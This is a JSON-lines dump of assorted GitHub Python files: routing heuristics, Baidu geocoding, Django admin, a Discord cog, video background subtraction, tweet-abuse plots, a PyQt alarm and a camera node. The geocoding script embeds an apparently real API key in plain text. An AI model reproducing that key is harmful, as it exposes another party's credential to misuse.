+{"seq_id":"1448895287","text":"from __future__ import (\n annotations,\n)\n\nimport itertools as it\nimport logging\nfrom random import (\n Random,\n)\nfrom typing import (\n TYPE_CHECKING,\n)\n\nfrom cached_property import (\n cached_property,\n)\n\nfrom .abc import (\n InsertionIterator,\n)\n\nif TYPE_CHECKING:\n from typing import Iterator\n from .....models import (\n Route,\n Trip,\n )\n\nlogger = logging.getLogger(__name__)\n\n\nclass StatelessInsertionIterator(InsertionIterator):\n @cached_property\n def iterator(self) -> Iterator[Route]:\n for route, trip in it.product(self._attractive_routes, self.pending_trips):\n logger.debug(f\"Yielding ({route}, {trip})...\")\n yield from self._strategy.compute(route, trip)\n\n def __next__(self) -> Route:\n return next(self.iterator)\n\n def _mark_trip_as_done(self, trip: Trip):\n super()._mark_trip_as_done(trip)\n self.flush()\n\n def flush(self):\n for key in (\"iterator\",):\n self.__dict__.pop(key, None)\n\n\nclass BestStatelessInsertionIterator(StatelessInsertionIterator):\n def __init__(self, randomized_size: int = 1, seed: int = 56, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.randomized_size = randomized_size\n self.random = Random(seed)\n\n def __next__(self) -> Route:\n candidates = self._criterion.nbest(self.randomized_size, *self.iterator)\n\n if not any(candidates):\n raise StopIteration\n\n best = self.random.choice(candidates)\n return best\n","repo_name":"garciparedes/jinete","sub_path":"jinete/algorithms/heuristics/insertion/iterators/stateless.py","file_name":"stateless.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"82"} +{"seq_id":"39432254885","text":"import json\nimport xlrd\nimport xlwt\nimport numpy as np\nfrom urllib.request import urlopen, quote\n\n# 保存数据到excel工作簿\ndef save(data, path='city_coordinate.xls'):\n f = xlwt.Workbook() # 创建工作簿\n sheet1 = f.add_sheet(u'sheet1', cell_overwrite_ok=True) # 创建sheet\n [h, l] = data.shape # h为行数,l为列数\n for i in range(h):\n for j in range(l):\n sheet1.write(i, j, data[i, j])\n\n f.save(path)\n\n# 提取城市坐标\ndef extract_city_coordinates(citylstfile='data_city.xlsx', ak='lxuvSE7TmLRquQPMmzhLsrEMjeOdy5CD '):\n data = xlrd.open_workbook(citylstfile)\n Sheet1 = data.sheet_by_name('Sheet1')\n citys = Sheet1.col_values(1)\n del citys[0] # 删除lst\n print(citys)\n \n lst = ['城市', '经度', '纬度']\n \n # API规则范例\n # http://api.map.baidu.com/geocoder?address=地址&output=输出格式类型&key=用户密钥&city=城市名\n # http://api.map.baidu.com/geocoding/v3/?address=北京市海淀区上地十街10号&output=json&ak=您的ak&callback=showLocation //GET请求\n url = 'http://api.map.baidu.com/geocoding/v3/'\n output = 'json'\n \n for i in citys:\n # 生成API URL\n add = quote(i)\n url += '?' + 'address=' + add + '&output=' + output + '&ak=' + ak # 百度地理编码API\n \n # 读取json数据\n req = urlopen(url)\n res = req.read().decode()\n temp = json.loads(res)\n \n print(i, temp['result']['location']['lng'],temp['result']['location']['lat']) # 经纬度\n \n # 经纬度\n coordinate = i, temp['result']['location']['lng'], temp['result']['location']['lat']\n coordinate = np.array(coordinate)\n lst = np.row_stack((lst, coordinate))\n return lst\n\n\n# 主函数\ndef main():\n lst = extract_city_coordinates('city_lst.xlsx', 'lxuvSE7TmLRquQPMmzhLsrEMjeOdy5CD ')\n print(lst)\n save(lst, 'city_coordinate.xls')\n\n# 执行\nmain()","repo_name":"niuyishuai/COVID-19-data","sub_path":"data/城市坐标数据/city_location.py","file_name":"city_location.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"34934066477","text":"from django.contrib import admin\nfrom HR.models import Post,Entrepreneur_content,Student_content,QA\nfrom django.contrib.auth.models import User,Group,Permission\nfrom django.contrib.auth.admin import UserAdmin\n\n# class CustomUserAdmin(UserAdmin):\n# list_display=('username',\n# 'first_name',\n# 'last_name',\n# 'password',\n# 'email',\n# 'phone',\n# 'addredd',\n# 'groups',\n# 'is_staff',\n# 'is_active',\n# 'last_login',\n# 'date_joined')\n\n\n\nclass PostAdmin(admin.ModelAdmin):\n list_display = ('postid',\n 'entrepreneur',\n 'jobtype',\n 'title',\n 'detail',\n 'condition',\n 'contact',\n 'benefit',\n 'min_salary',\n 'post_date',\n 'viewed',\n 'like')\n\n\nclass Entrepreneur_contentAdmin(admin.ModelAdmin):\n list_display = ('entrepreneur','introduction','address','phone')\n\n\nclass Student_contentAdmin(admin.ModelAdmin):\n list_display = ('student','mis_id','resume')\n\n\nclass QAAdmin(admin.ModelAdmin):\n list_display = ('qaid','student','entrepreneur','post','content','post_date')\n\nadmin.site.register(QA,QAAdmin)\nadmin.site.register(Student_content,Student_contentAdmin)\nadmin.site.register(Entrepreneur_content,Entrepreneur_contentAdmin)\nadmin.site.register(Post,PostAdmin)\n# admin.site.register(User,CustomUserAdmin)\n\n# ------------old line\n# class PostAdmin(admin.ModelAdmin):\n# list_display = ('ArticleId',\n# 'VendorId',\n# 'AContent_title',\n# 'Type',\n# 'MinSalary',\n# 'AContent_detail',\n# 'Acontent_condition',\n# 'AContent_benefit',\n# 'AContent_contact',\n# 'Views',\n# 'Like',\n# 'PostingTime')\n\n# class VendorAdmin(admin.ModelAdmin):\n# list_display = ('VendorId','Name','Password','Email','Phone','Address')\n\n# class QAAdmin(admin.ModelAdmin):\n# list_display = ('QAId','ArticleId','ClientId','VendorId','QContent','PostingTime')\n\n# class ClientAdmin(admin.ModelAdmin):\n# list_display = ('ClientId','Name','Password','Email','Phone','Resume')\n\n\n# admin.site.register(Post,PostAdmin)\n# admin.site.register(Vendor,VendorAdmin)\n# admin.site.register(QA,QAAdmin)\n# admin.site.register(Client,ClientAdmin)\n","repo_name":"Charliesgithub20221030/mi_club_web","sub_path":"HR/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"19184127235","text":"from __future__ import annotations\n\nimport typing\nimport logging\nimport re\n\nimport discord\nfrom discord.ext import commands as _commands\n\nfrom .redis import RedisChannelHandler\n\nif typing.TYPE_CHECKING:\n from .custom_bot import Bot\n from .database import DatabaseWrapper\n\n\nBotT = typing.TypeVar(\"BotT\", bound=\"Bot\")\n\n\nclass Cog(_commands.Cog, typing.Generic[BotT]):\n \"\"\"\n A slightly modified cog class to allow for the ``cache_setup`` method and for the class' ``logger`` instance.\n\n Attributes:\n bot (Bot): The bot instance that the cog was added to.\n logger (logging.Logger): The logger that's assigned to the cog instance. This will be used\n for logging command calls, even if you choose not to use it yourself.\n qualified_name (str): The human-readable name for the cog.\n\n ::\n\n class MyCog(voxelbotutils.Cog): pass\n c = MyCog(bot)\n c.qualified_name # \"My Cog\"\n\n class APICommands(voxelbotutils.Cog): pass\n c = APICommands(bot)\n c.qualified_name # \"API Commands\"\n \"\"\"\n\n def __init__(self, bot: BotT, logger_name: typing.Optional[str] = None):\n \"\"\"\n Args:\n bot (Bot): The bot that should be added to the cog.\n \"\"\"\n\n self.bot = bot\n bot_logger: logging.Logger = getattr(bot, \"logger\", logging.getLogger(\"bot\"))\n if logger_name:\n self.logger = bot_logger.getChild(logger_name)\n else:\n self.logger = bot_logger.getChild(self.get_logger_name())\n\n # Add the cog instance to redis channel handlers\n for attr in dir(self):\n try:\n item = getattr(self, attr)\n except AttributeError:\n continue\n if isinstance(item, RedisChannelHandler):\n item.cog = self\n\n def get_logger_name(self, *prefixes, sep: str = '.') -> str:\n \"\"\"\n Gets the name of the class with any given prefixes, with sep as a seperator. You\n tend to not need this yourself, but it is instead called internally by the bot\n when generating the :attr:`logger` instance.\n \"\"\"\n\n return sep.join(['cog'] + list(prefixes) + [self.__cog_name__.replace(' ', '')])\n\n @property\n def qualified_name(self) -> str:\n \"\"\":meta private:\"\"\"\n\n return re.sub(\n r\"(?:[A-Z])(?:(?:[a-z0-9])+|[A-Z]+$|[A-Z]+(?=[A-Z]))?\", \"\\\\g<0> \",\n super().qualified_name.replace(' ', '')\n ).strip()\n\n async def cache_setup(self, database: DatabaseWrapper):\n \"\"\"\n A method that gets run when the bot's startup method is run -\n intended for setting up cached information in the bot object that aren't in the\n :attr:`voxelbotutils.Bot.guild_settings` or :attr:`voxelbotutils.Bot.user_settings`\n tables. This setup should *clear* your caches before setting them, as the :func:`voxelbotutils.Bot.startup`\n method may be called multiple times.\n \"\"\"\n\n pass\n","repo_name":"Voxel-Fox-Ltd/Novus","sub_path":"discord/ext/vbu/cogs/utils/custom_cog.py","file_name":"custom_cog.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"82"} +{"seq_id":"43723622738","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# File : core.classifiers.RCNLPTextClassifier.py\n# Description : Echo State Network for text classification.\n# Auteur : Nils Schaetti \n# Date : 01.02.2017 17:59:05\n# Lieu : Nyon, Suisse\n#\n# This file is part of the Reservoir Computing NLP Project.\n# The Reservoir Computing Memory Project is a set of free software:\n# you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Foobar is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# You should have received a copy of the GNU General Public License\n# along with Foobar. If not, see .\n#\n\nimport numpy as np\nimport torch.utils.data\nfrom torch.autograd import Variable\nimport echotorch.nn as etnn\nimport echotorch.utils\nfrom tools import argument_parsing, dataset, functions, features\nimport matplotlib.pyplot as plt\nimport nsNLP\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\n\n####################################################\n# Main\n####################################################\n\n\n# Argument builder\nargs = nsNLP.tools.ArgumentBuilder(desc=u\"Argument test\")\n\n# Dataset arguments\nargs.add_argument(command=\"--k\", name=\"k\", type=int, help=\"K-Fold Cross Validation\", extended=False, default=10)\nargs.add_argument(command=\"--author\", name=\"author\", type=str, help=\"Author to test\", extended=False, default=None)\n\n# Experiment output parameters\nargs.add_argument(command=\"--name\", name=\"name\", type=str, help=\"Experiment's name\", extended=False, required=True)\nargs.add_argument(command=\"--description\", name=\"description\", type=str, help=\"Experiment's description\",\n extended=False, required=True)\nargs.add_argument(command=\"--output\", name=\"output\", type=str, help=\"Experiment's output directory\", required=True,\n extended=False)\nargs.add_argument(command=\"--verbose\", name=\"verbose\", type=int, help=\"Verbose level\", default=2, extended=False)\n\n# Parse arguments\nargs.parse()\n\n# Load from directory\nsfgram_dataset, sfgram_loader_train, sfgram_loader_test = dataset.load_dataset(args.author, '')\n\n# Experiment\nxp = nsNLP.tools.ResultManager\\\n(\n args.output,\n args.name,\n args.description,\n args.get_space(),\n 1,\n args.k,\n verbose=args.verbose\n)\n\n# Average\naverage_k_fold = np.array([])\n\n# Print authors\nxp.write(u\"Author : {}\".format(sfgram_dataset.author), log_level=0)\nxp.write(u\"Texts : {}\".format(len(sfgram_dataset.texts)), log_level=0)\n\n# For each batch\nfor k in range(10):\n # Choose fold\n xp.set_fold_state(k)\n sfgram_loader_train.dataset.set_fold(k)\n sfgram_loader_test.dataset.set_fold(k)\n\n # Choose the right transformer\n sfgram_dataset.transform = None\n\n # Prediction for each threshold\n truth_vector = np.zeros((len(sfgram_loader_test)), dtype=np.int32)\n prediction_vector = np.ones((len(sfgram_loader_test)), dtype=np.int32)\n\n # Get test data for this fold\n for i, data in enumerate(sfgram_loader_test):\n # Sample\n inputs, label = data\n\n # Present or not\n for j in label:\n if int(j) == 1:\n truth_vector[i] = 1\n # end if\n # end for\n # end for\n\n try:\n # F1 score\n tp_fp = float(np.sum(prediction_vector))\n tp_fn = float(np.sum(truth_vector))\n mask = prediction_vector == 1\n tp = float(np.sum(truth_vector[mask]))\n\n # Precision and recall\n precision = tp / tp_fp\n recall = tp / tp_fn\n\n # Compute F1\n f1_score = 2.0 * ((precision * recall) / (precision + recall))\n except ZeroDivisionError:\n f1_score = 0.0\n # end try\n\n # Print success rate\n xp.add_result(f1_score)\n# end for\n\nxp.save()","repo_name":"nschaetti/ESN-SF-JCDL","sub_path":"baseline_true.py","file_name":"baseline_true.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"3612820051","text":"#!/usr/bin/env python\n\nimport Queue\nimport StringIO\nimport threading\nimport time\n\nimport cv2\nimport pizco\n\nimport ionode.base\n\nhost = '127.0.0.1'\nport = 21022\n\nprint_timing = True\n\n\nclass CaptureThread(threading.Thread):\n def __init__(self, capture_id=-1):\n self.stop_event = threading.Event()\n self.capture_id = capture_id\n self.queue = Queue.Queue(maxsize=10)\n super(CaptureThread, self).__init__()\n\n def run(self):\n c = cv2.VideoCapture(self.capture_id)\n t0 = time.time()\n count = 0\n while not self.stop_event.is_set():\n r, f = c.read()\n t1 = time.time()\n if count % 10 == 0:\n print(\"FPS: %s\" % (1. / (t1 - t0)))\n t0 = t1\n count += 1\n if r:\n if self.queue.full():\n self.queue.get()\n self.queue.put(f)\n print(\"Releasing capture\")\n del c\n\n def stop(self):\n print(\"CaptureThread.stop called\")\n self.stop_event.set()\n\n def get_frame(self, recent=False, wait=False):\n try:\n f = self.queue.get(wait)\n if not recent:\n return f\n while not self.queue.empty():\n f = self.queue.get(wait)\n except Queue.Empty:\n return None\n return f\n\n\nclass CameraNode(ionode.base.IONode):\n def __init__(self, cfg=None):\n super(CameraNode, self).__init__(cfg)\n self.new_image = pizco.Signal(nargs=1)\n self.state = 'disconnected'\n self.streaming = False\n self.cam = None\n\n def start_streaming(self):\n if self.streaming:\n return\n self.streaming = True\n self.grab()\n\n def stop_streaming(self):\n if not self.streaming:\n return\n self.streaming = False\n\n def connect(self):\n if self.cam is not None:\n return\n print(\"Connecting to camera\")\n self.cam = CaptureThread()\n self.cam.start()\n self.start_streaming()\n\n def disconnect(self):\n if self.cam is None:\n return\n print(\"Disconnecting from camera\")\n self.stop_streaming()\n self.cam.stop()\n self.cam.join()\n self.cam = None\n\n def connected(self):\n return self.cam is not None\n\n def grab(self, in_callback=False):\n if not self.connected():\n return\n if not in_callback:\n return self.loop.add_callback(self.grab, True)\n f = self.cam.get_frame(recent=True)\n if f is not None and self.streaming:\n # convert to string\n t0 = time.time()\n _, b = cv2.imencode(\".jpg\", f)\n t1 = time.time()\n e = b.tostring().encode('base64')\n t2 = time.time()\n self.new_image.emit(e)\n t3 = time.time()\n if print_timing:\n print(\"Timing:[total %s]\" % (t3 - t0))\n print(\"\\tjpeg : %s\" % (t1 - t0))\n print(\"\\tbase64 : %s\" % (t2 - t1))\n print(\"\\temit : %s\" % (t3 - t2))\n if self.streaming:\n self.loop.add_callback(self.grab, True)\n return\n\nif __name__ == '__main__':\n cfg = {}\n cfg['addr'] = (\n 'tcp://%s:%s' % (host, port))\n node = CameraNode(cfg)\n node.serve_forever()\n","repo_name":"braingram/ionode","sub_path":"examples/03/start_ionode.py","file_name":"start_ionode.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"74121938827","text":"def votar(ano):\n from datetime import date \n\n idade = date.today().year - ano\n if idade > 65:\n return(f'O voto para quem tem mais de {idade} anos não é obrigatório.')\n elif idade > 18:\n return(f'O voto para quem tem {idade} anos é obrigatório. ')\n else:\n return(f'O voto para quem tem mais de {idade} é proibido. ')\n\n\nprint(votar(int(input('Em que ano você nasceu? '))))\n","repo_name":"barreto-jpedro/Python-course-exercises","sub_path":"Mundo 03/Exercícios/Ex101.py","file_name":"Ex101.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"23043139280","text":"import os\nfrom copy import deepcopy\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom data import cdnet\nfrom video import bg_subtraction\nfrom evaluation import metrics\nfrom evaluation import animations\n\n\nOUT_VIDEO_PATH_BASE = os.path.join('week3', 'resources', 'prev')\nOUT_VIDEO_EXTENSION = 'gif' #['gif','mp4']\nOUT_VIDEO_CODEC = None #[None,'mp4v']\n\n\ndataset_train_idx = {'highway': (1050, 1200),\n 'fall': (1460, 1510),\n 'traffic': (950, 1000)}\n\ndataset_test_idx = {'highway': (1200, 1350),\n 'fall': (1510, 1560),\n 'traffic': (1000, 1050)}\n\n\ndef animate(test, model, f_results, beta, dataset, alpha_values, rho_values):\n\n best_rho, best_alpha = np.unravel_index(np.argmax(f_results),\n f_results.shape)\n\n pred = bg_subtraction.predict(test, model, alpha=alpha_values[best_alpha],\n rho=rho_values[best_rho])\n\n out_filename = 'adapt-' + dataset + '-alpha_' \\\n + str(alpha_values[best_alpha]) + '_rho_' \\\n + str(rho_values[best_rho])\n\n out_video_path_full = os.path.join(OUT_VIDEO_PATH_BASE, str(beta)) + '_'\n\n if out_filename is not None and OUT_VIDEO_EXTENSION is not None:\n print('>>>>Recording animation in ' + out_video_path_full +\n out_filename + '.' + OUT_VIDEO_EXTENSION + '...')\n\n animations.video_recorder(pred, out_video_path_full, out_filename,\n OUT_VIDEO_CODEC, OUT_VIDEO_EXTENSION)\n\n\ndef plot_grid_search(alpha_values, rho_values, f1_results, title=''):\n \"\"\"Plot F1-score for a grid search\"\"\"\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n # https://matplotlib.org/examples/mplot3d/surface3d_demo.html\n X, Y = np.meshgrid(alpha_values, rho_values)\n surf = ax.plot_surface(X, Y, f1_results, cmap='plasma',\n linewidth=0, antialiased=True)\n fig.colorbar(surf)\n\n ax.set_xlabel('alpha', size='large', weight='bold')\n ax.set_ylabel('rho', size='large', weight='bold')\n ax.set_zlabel('f1', size='large', weight='bold')\n\n plt.title(title)\n plt.show()\n\n return fig\n\n\ndef grid_search(dataset, alpha_values, rho_values, beta):\n \"\"\"Perform a grid search over rho and alpha hyperparameters\"\"\"\n # Load datasets\n train_start, train_end = dataset_train_idx[dataset]\n test_start, test_end = dataset_test_idx[dataset]\n train = cdnet.read_dataset(dataset, train_start, train_end,\n colorspace='gray', annotated=False)\n test, gt = cdnet.read_dataset(dataset, test_start, test_end,\n colorspace='gray', annotated=True)\n\n # Initial model\n model = bg_subtraction.create_model(train)\n model_backup = deepcopy(model)\n\n # Grid search\n f_results = np.zeros((len(rho_values), len(alpha_values)), dtype='float32')\n\n for i, rho in enumerate(rho_values):\n for j, alpha in enumerate(alpha_values):\n pred = bg_subtraction.predict(test, model, alpha, rho=rho)\n summary = metrics.eval_from_mask(pred, gt[:,0,:,:], gt[:,1,:,:])\n f_results[i, j] = metrics.f_score(summary, beta=beta)\n print('- alpha {:0.2f}, rho {:0.2f}: {:0.4f}'.format(\n alpha, rho, f_results[i, j]))\n\n animate(test, model_backup, f_results, beta, dataset, alpha_values, rho_values)\n return f_results\n\n\ndef run(dataset):\n \"\"\"Task 2.1\n\n Grid search for hyperparameter selection in background estimation with\n adaptive model\n\n \"\"\"\n betas = [10, 12, 14]\n\n # Hyperparameters values to test\n if dataset == 'highway':\n alpha_values = np.arange(0, 8, 0.25)\n rho_values = np.arange(0, 1, 0.10)\n elif dataset == 'fall':\n alpha_values = np.arange(0, 8, 0.25)\n rho_values = np.arange(0, 1, 0.10)\n elif dataset == 'traffic':\n alpha_values = np.arange(0, 6, 0.20)\n rho_values = np.arange(0, 0.4, 0.05)\n\n # Grid search\n for beta in betas:\n f_results = grid_search(dataset, alpha_values, rho_values, beta)\n\n # Find best score\n best_f = f_results.max()\n best_rho, best_alpha = np.unravel_index(np.argmax(f_results),\n f_results.shape)\n\n print('Best parameters for Beta= {:0.1f}: alpha {:0.2f}, rho {:0.2f}, '\n 'with F-score {:0.4f}'.format(beta, alpha_values[best_alpha],\n rho_values[best_rho], best_f))\n\n # Plot results and print best parameters\n plot_grid_search(alpha_values, rho_values, f_results,\n title=dataset)\n","repo_name":"mcv-m6-video/mcv-m6-2018-team9","sub_path":"week3/task1_f1metric.py","file_name":"task1_f1metric.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"24453269568","text":"class Solution:\n def minSpeedOnTime(self, dist: List[int], hour: float) -> int:\n left = 1\n right = 10**7 + 1\n \n def computeSpeed(assumeSpeed):\n res = 0\n n = len(dist)\n for i in range(0,n-1):\n val = math.ceil(dist[i]/assumeSpeed)\n res+=val\n res+=dist[-1]/assumeSpeed\n return res\n res = -1\n while left', methods=['GET'])\ndef gold_analysis(type):\n\n if type == 1:\n return render_template('frontend/plot1.html', url=url_for('front.visualize_plot1'),\n title=\"Normalize len of word from tweet Distribution Plot\")\n elif type == 2:\n return render_template('frontend/plot1.html', url=url_for('front.visualize_plot2'),\n title=\"15 Most Frequent Abusive Word\")\n elif type == 3:\n return render_template('frontend/plot1.html', url=url_for('front.visualize_plot3'),\n title=\"Most Frequent Hate speech Category\")\n\n\n@front.route('/visualize/plot1')\ndef visualize_plot1():\n fig, ax = plt.subplots(figsize=(20, 10))\n\n # ternyata ada kata2 yang terdaftar di abusive seperti sipit tidak ada flag abusive atau HSnya\n # query text yang ter log atau terdeteksi di alayabusivelog yang terdaftar sebagai mixed atau abusive\n # ada 3 tipe yaitu abusive, alay, dan mixed(kata alay yang ternyata artinya adalah abusive word)\n df_file = pd.read_sql_query(\n sql=db.select(\n [FileTextLog.ID, FileTextLog.Tweet, FileTextLog.Clean, AlayAbusiveFileLog.word, AlayAbusiveFileLog.clean])\n .join(AlayAbusiveFileLog, AlayAbusiveFileLog.file_upload_text_log_id == FileTextLog.ID)\n .filter(AlayAbusiveFileLog.foul_type != \"ALAY\"),\n con=db.engine\n )\n # 15 abusive clean word terbanyak\n # print(df_file['clean'].value_counts()[:15])\n # # 15 abusive raw word terbanyak\n # print(df_file['word'].value_counts()[:15])\n # #\n # print(df_file['Tweet'].value_counts()[:15])\n\n # coba assign word count\n df_new = (\n df_file\n .groupby('Tweet')\n .agg({'word': 'count'}) # jumlah abusivenya\n .sort_values('word', ascending=False)\n .reset_index()\n .assign(\n len_char=lambda x: x['Tweet'].str.len(),\n len_word=lambda x: x['Tweet'].str.split().str.len() # jumlah katanya\n )\n )\n\n # jumlah tweet yang mengandung abusive dan hatespeech\n # print(df_new.head())\n # median\n # print(df_new.median(numeric_only=True))\n # q1\n q1 = df_new['len_word'].quantile(0.25)\n # print(q1)\n # q2\n q2 = df_new['len_word'].quantile(0.5)\n # print(q2)\n # q3\n q3 = df_new['len_word'].quantile(0.75)\n # print(q3)\n\n iqr = q3 - q1\n # print(iqr)\n limit = 1.5 * iqr\n lower_bound = q1 - limit\n upper_bound = q3 + limit\n\n # print(lower_bound)\n # hasilnya -13\n # print(upper_bound)\n # hasilnya 43\n # print(df_new['len_word'].max())\n # max ada di 52\n # berarti ada outlier\n\n df_remove = df_new[df_new['len_word'] < upper_bound]\n df_remove_outlier = df_remove[df_remove['len_word'] > lower_bound]\n min_max_scaler = p.MinMaxScaler()\n\n normalize_len_word = min_max_scaler.fit_transform(df_remove_outlier['len_word'].values.reshape(-1,1))\n df_with_norm = df_remove_outlier.assign(normalized=normalize_len_word.flatten())\n # print(df_with_norm)\n # print(df_with_norm['normalized'].skew())\n # print(df_with_norm['normalized'].mean())\n # print(df_with_norm['normalized'].median())\n sns.histplot(df_with_norm['normalized'], kde=True)\n\n canvas = FigureCanvas(fig)\n img = io.BytesIO()\n fig.savefig(img)\n img.seek(0)\n\n return send_file(img, mimetype='img/png')\n\n@front.route('/visualize/plot2')\ndef visualize_plot2():\n fig, ax = plt.subplots(figsize=(20, 10))\n\n # ternyata ada kata2 yang terdaftar di abusive seperti sipit tidak ada flag abusive atau HSnya\n # query text yang ter log atau terdeteksi di alayabusivelog yang terdaftar sebagai mixed atau abusive\n # ada 3 tipe yaitu abusive, alay, dan mixed(kata alay yang ternyata artinya adalah abusive word)\n df_file = pd.read_sql_query(\n sql=db.select(\n [FileTextLog.ID, FileTextLog.Tweet, FileTextLog.Clean, AlayAbusiveFileLog.word, AlayAbusiveFileLog.clean])\n .join(AlayAbusiveFileLog, AlayAbusiveFileLog.file_upload_text_log_id == FileTextLog.ID)\n .filter(AlayAbusiveFileLog.foul_type != \"ALAY\"),\n con=db.engine\n )\n # # 15 abusive clean word terbanyak\n xy = df_file['clean'].value_counts()[:15]\n\n x = list(xy.keys())\n y = list(xy.values)\n\n # # 15 abusive raw word terbanyak\n # print(df_file['word'].value_counts()[:15])\n # #\n # print(df_file['Tweet'].value_counts()[:15])\n sns.barplot(x=x, y=y)\n\n canvas = FigureCanvas(fig)\n img = io.BytesIO()\n fig.savefig(img)\n img.seek(0)\n\n return send_file(img, mimetype='img/png')\n\n@front.route('/visualize/plot3')\ndef visualize_plot3():\n fig, ax = plt.subplots(figsize=(20, 10))\n # ternyata ada kata2 yang terdaftar di abusive seperti sipit tidak ada flag abusive atau HSnya\n # query text yang ter log atau terdeteksi di alayabusivelog yang terdaftar sebagai mixed atau abusive\n # ada 3 tipe yaitu abusive, alay, dan mixed(kata alay yang ternyata artinya adalah abusive word)\n df_file = pd.read_sql_query(\n sql=db.select(\n [FileTextLog.ID, FileTextLog.Tweet, FileTextLog.Clean, FileTextLog.HS, FileTextLog.Abusive,\n FileTextLog.HS_Gender, FileTextLog.HS_Group, FileTextLog.HS_Individual, FileTextLog.HS_Race,\n FileTextLog.HS_Physical, FileTextLog.HS_Religion, FileTextLog.HS_Strong, FileTextLog.HS_Weak,\n FileTextLog.HS_Moderate, FileTextLog.HS_Other, AlayAbusiveFileLog.word, AlayAbusiveFileLog.clean])\n .join(AlayAbusiveFileLog, AlayAbusiveFileLog.file_upload_text_log_id == FileTextLog.ID)\n .filter(AlayAbusiveFileLog.foul_type != \"ALAY\"),\n con=db.engine\n )\n\n sums = df_file.select_dtypes(np.number).sum().rename('total')\n sums.pop('ID')\n # print(sums)\n x = list(sums.keys())\n y = list(sums.values)\n\n # print(x)\n # print(y)\n # # 15 abusive raw word terbanyak\n # print(df_file['word'].value_counts()[:15])\n # #\n # print(df_file['Tweet'].value_counts()[:15])\n sns.barplot(x=x, y=y)\n\n canvas = FigureCanvas(fig)\n img = io.BytesIO()\n fig.savefig(img)\n img.seek(0)\n return send_file(img, mimetype='img/png')\n","repo_name":"galihsuyoga/cleansingText","sub_path":"main/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"5451981120","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5 import uic\nimport sys\n\nfrom timer import MyDialog\n\n\n\nclass MyWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n uic.loadUi('MainWindow.ui', self)\n # self.spinBox.valueChanged.connect(self.pb_guncelle)\n now = QDateTime.currentDateTime()\n \n self.timer = QTimer()\n self.d = MyDialog()\n self.d.kabuletti.connect(self.test)\n self.d.exec()\n self.dateTimeEdit.setDateTime(now)\n self.btnSetAlarm.clicked.connect(self.alarm_kur)\n self.msg = QMessageBox()\n self.msg.setText(\"asdasd\")\n self.msg.setStandardButtons(QMessageBox.Yes | QMessageBox.Cancel)\n self.msg.accepted.connect(self.test)\n self.msg.rejected.connect(self.rej)\n self.msg.exec()\n def rej(self):\n print('nooooo')\n def test(self, isim):\n print(isim)\n\n def alarm_kur(self):\n \n now = QDateTime.currentDateTime()\n zaman = self.dateTimeEdit.dateTime()\n\n fark = now.msecsTo(zaman)\n\n if fark < 1:\n mb = QMessageBox()\n mb.setText(\"hata\")\n mb.exec()\n return\n\n # butonu disable et\n self.btnSetAlarm.setEnabled(False)\n \n self.timer.timeout.connect(self.tick)\n self.timer.start((fark *5) / 100)\n\n\n def tick(self):\n pb_deger = self.progressBar.value()\n self.pb_guncelle(pb_deger - 5)\n\n if pb_deger < 1:\n self.timer.stop()\n self.btnSetAlarm.setEnabled(True)\n self.progressBar.setValue(100)\n\n def pb_guncelle(self, sayi):\n self.progressBar.setValue(sayi)\n\napp = QApplication(sys.argv)\nmw = MyWindow()\nmw.show()\nsys.exit(app.exec_())","repo_name":"bkayranci/pyqt-alarm","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72258287628","text":"import discordsdk as dsdk\nimport time, uuid\n\nimport pygame\nfrom maintenance import process_exists\nfrom PIL import Image\n\n\nclass Discord():\n def __init__(self, mixer):\n if process_exists(\"discord.exe\"):\n self.discord_active = True\n else:\n self.discord_active = False\n\n self.mixer = mixer\n self.portrait = None\n\n if self.discord_active:\n discord_application_id = 1097332146923913288\n self.app = dsdk.Discord(discord_application_id, dsdk.CreateFlags.default)\n\n self.activity_manager = self.app.get_activity_manager()\n self.activity_manager.on_activity_join_request = self.on_activity_join_request\n time.sleep(0.2)\n #\n self.activity_manager.on_activity_join = self.on_activity_join\n self.activity_manager.on_activity_invite = self.on_activity_invite\n time.sleep(0.2)\n\n self.user_manager = self.app.get_user_manager()\n self.image_manager = self.app.get_image_manager()\n time.sleep(0.2)\n\n self.user_manager.on_current_user_update = self.on_current_user_update\n time.sleep(0.2)\n\n # setup activity\n 